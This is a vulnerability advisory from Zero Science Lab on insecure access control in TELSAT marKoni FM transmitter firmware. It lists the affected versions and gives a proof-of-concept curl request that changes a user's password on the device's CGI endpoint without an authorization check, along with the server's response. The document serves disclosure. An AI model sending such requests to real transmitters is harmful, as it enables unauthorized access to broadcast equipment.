TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control

`  
  
TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password  
  
  
Vendor: TELSAT Srl  
Product web page: https://www.markoni.it  
Affected version: Markoni-D (Compact) FM Transmitters  
Markoni-DH (Exciter+Amplifiers) FM Transmitters  
Markoni-A (Analogue Modulator) FM Transmitters  
Firmware: 1.9.5  
1.9.3  
1.5.9  
1.4.6  
1.3.9  
  
Summary: Professional FM transmitters.  
  
Desc: Unauthorized user could exploit this vulnerability to change  
his/her password, potentially gaining unauthorized access to sensitive  
information or performing actions beyond her/his designated permissions.  
  
Tested on: GNU/Linux 3.10.53 (armv7l)  
icorem6solox  
lighttpd/1.4.33  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience  
  
  
Advisory ID: ZSL-2024-5811  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php  
  
  
10.11.2023  
  
--  
  
  
PoC request of a user changing his own password.  
Only admin can edit users. No permissions or Cookie check.  
  
$ curl -s -H "Cookie: name=user-1702119917" \  
http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t  
  
HTTP/1.1 200 OK  
Content-type: text/html  
Cache-control: no-cache  
Set-Cookie: name=user-1702119917; max-age=315360000  
Transfer-Encoding: chunked  
Date: Sat, 9 Dec 2023 11:05:17 GMT  
Server: lighttpd/1.4.33  
  
oc=4&resp=0  
`